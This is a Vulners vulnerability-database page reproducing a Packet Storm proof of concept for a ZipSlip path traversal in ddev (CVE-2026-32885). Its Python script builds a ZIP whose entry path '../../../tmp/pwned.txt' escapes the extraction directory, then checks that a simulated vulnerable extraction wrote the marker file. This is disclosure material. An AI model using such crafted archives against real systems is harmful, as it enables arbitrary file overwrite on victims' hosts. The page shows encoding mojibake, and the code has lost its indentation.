Vulners
Lucene search
π ddev ZipSlip Path Traversal
ποΈΒ 17 Apr 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 56Β Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2026-32885 | 22 Apr 202616:54 | β | attackerkb |
 | ddev θ·―εΎιεζΌζ΄ | 22 Apr 202600:00 | β | cnnvd |
 | CVE-2026-32885 | 22 Apr 202616:54 | β | cve |
 | CVE-2026-32885 DDEV has ZipSlip path traversal in tar and zip archive extraction | 22 Apr 202616:54 | β | cvelist |
 | EUVD-2026-25049 | 22 Apr 202619:06 | β | euvd |
 | DDEV has ZipSlip path traversal in tar and zip archive extraction | 22 Apr 202619:06 | β | github |
 | CVE-2026-32885 | 22 Apr 202617:16 | β | nvd |
 | GHSA-X2XQ-QHJF-5MVG DDEV has ZipSlip path traversal in tar and zip archive extraction | 22 Apr 202619:06 | β | osv |
| π ddev/ddev ZipSlip Path Traversal | 24 Mar 202600:00 | β | packetstorm |
 | PT-2026-34524 | 22 Apr 202600:00 | β | ptsecurity |
10
==================================================================================================================================
| # Title : ddev ZipSlip Path Traversal β Arbitrary File Write via Malicious Archive |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines.
The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system.
[+] POC :
#!/usr/bin/env python3
import zipfile
import os
OUTPUT_ZIP = "exploit.zip"
PAYLOAD_PATH = "../../../tmp/pwned.txt"
PAYLOAD_CONTENT = "HACKED: ZipSlip successful!\n"
def create_malicious_zip():
print("[*] Creating malicious ZIP...")
with zipfile.ZipFile(OUTPUT_ZIP, 'w', zipfile.ZIP_DEFLATED) as z:
z.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
print(f"[+] Malicious archive created: {OUTPUT_ZIP}")
print(f"[+] Payload path inside archive: {PAYLOAD_PATH}")
def simulate_vulnerable_extract(dest):
"""
Simulates vulnerable ddev behavior
(filepath.Join without validation)
"""
print(f"\n[*] Simulating vulnerable extraction to: {dest}")
with zipfile.ZipFile(OUTPUT_ZIP, 'r') as z:
for file in z.infolist():
extracted_path = os.path.join(dest, file.filename)
print(f"[!] Writing to: {extracted_path}")
os.makedirs(os.path.dirname(extracted_path), exist_ok=True)
with open(extracted_path, "wb") as f:
f.write(z.read(file.filename))
def check_result():
target = "/tmp/pwned.txt"
print("\n[*] Checking result...")
if os.path.exists(target):
print(f"[+] SUCCESS: File written Off the track: {target}")
with open(target) as f:
print("[+] Content:", f.read())
else:
print("[-] Exploit failed")
if __name__ == "__main__":
create_malicious_zip()
safe_dir = "./safe_extract"
os.makedirs(safe_dir, exist_ok=True)
simulate_vulnerable_extract(safe_dir)
check_result()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.5
EPSS0.00019
SSVC